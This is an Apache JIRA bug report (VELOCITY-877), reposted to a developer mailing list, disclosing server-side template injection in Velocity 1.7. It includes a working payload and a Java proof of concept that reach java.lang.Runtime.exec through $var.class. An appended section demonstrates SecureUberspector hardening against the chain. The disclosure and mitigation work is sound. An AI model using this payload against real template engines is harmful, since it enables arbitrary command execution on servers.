Posted to dev@velocity.apache.org by "Markus Wulftange (JIRA)" <ji...@apache.org> on 2016/08/15 15:26:20 UTC

[jira] [Created] (VELOCITY-877) Access to critical fields/methods allows execution of arbitrary code ('Template Injection')

Markus Wulftange created VELOCITY-877:
-----------------------------------------

             Summary: Access to critical fields/methods allows execution of arbitrary code ('Template Injection')
                 Key: VELOCITY-877
                 URL: https://issues.apache.org/jira/browse/VELOCITY-877
             Project: Velocity
          Issue Type: Bug
          Components: Engine
    Affects Versions: 1.7
            Reporter: Markus Wulftange
            Priority: Critical


It is possible to reference certain fields/methods, which eventually allow the execution of arbitrary methods.

For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of any variable, it is possible to get the variable's class object. This can be extended to get arbitrary class objects and execute arbitrary methods.

For example, the following statement results in the execution of '{{xterm}}':
{code}
$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
{code}

As a standalone:

{code:java}
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.Velocity;
import org.apache.velocity.context.Context;

public class VelocityTest {

	public static void main(String[] args) {
		Context context = new VelocityContext();
		context.put("var", "foo");
		String instring = "#set($String=$var.class.class.forName('java.lang.String'))"
				+ "#set($Character=$var.class.class.forName('java.lang.Character'))"
				+ "#set($Runtime=$var.class.class.forName('java.lang.Runtime'))"
				+ "#set($proc=$Runtime.getRuntime().exec('xterm'))$proc.waitFor()";
		Velocity.evaluate(context, null, "templateName", instring);
	}

}
{code}

This issue has already been made public in the past by James Kettle in August 2015 (see http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity) and via CVE-2015-5603 (see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly others.
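The engine-side mitigation that ships with Velocity for exactly this chain is the SecureUberspector, which refuses to resolve {{getClass()}}/{{class}} and any method on the classes or packages listed in {{introspector.restrict.classes}} and {{introspector.restrict.packages}}. The following standalone program is an added example, not part of this report and not Velocity project code; it renders the same kind of probe against a default engine and against a hardened one. The property keys and the SecureUberspector class name are the real Velocity 1.x ones; the restrict lists, the template string and the variable names are assumptions chosen for the demonstration.

```java
import java.io.StringWriter;
import java.util.Properties;

import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.context.Context;

public class VelocitySecureUberspectorDemo {

    // Constructed probe template (assumption): it only attempts the first link of the
    // chain from the report, reading the "class" property of a context variable.
    // With the hardened engine that lookup resolves to null, so no Class object
    // is ever available to continue with forName()/getRuntime().
    static final String PROBE = "#set($k = $var.class)$k";

    static VelocityEngine hardenedEngine() {
        Properties p = new Properties();
        // Real Velocity property keys; SecureUberspector is shipped with the engine.
        p.setProperty("runtime.introspector.uberspect",
                "org.apache.velocity.util.introspection.SecureUberspector");
        // Restrict lists are assumptions for this demo; SecureUberspector already
        // blocks getClass() and java.lang.Class/ClassLoader/Runtime/Thread by default.
        p.setProperty("introspector.restrict.classes",
                "java.lang.Class,java.lang.ClassLoader,java.lang.Runtime,"
                        + "java.lang.Thread,java.lang.Process,java.lang.ProcessBuilder");
        p.setProperty("introspector.restrict.packages", "java.lang.reflect");
        VelocityEngine engine = new VelocityEngine();
        engine.init(p);
        return engine;
    }

    // Render a template with a single String variable in the context, as in the report.
    static String render(VelocityEngine engine, String template) {
        Context context = new VelocityContext();
        context.put("var", "foo");
        StringWriter out = new StringWriter();
        engine.evaluate(context, out, "probe", template);
        return out.toString();
    }

    public static void main(String[] args) {
        VelocityEngine plain = new VelocityEngine();
        plain.init();
        // Default engine: the Class object is reachable and its toString() is rendered.
        System.out.println("default engine : " + render(plain, PROBE));
        // Hardened engine: the lookup is refused, the reference stays unresolved.
        System.out.println("secure engine  : " + render(hardenedEngine(), PROBE));
    }
}
```

The uberspector only limits what the introspector will resolve; it does not make it safe to build template source from user input. Treat template text as code and user-controlled values as context data, and use the SecureUberspector (plus the restrict lists) as defence in depth for the case where an attacker nevertheless gets to influence the template itself.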



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
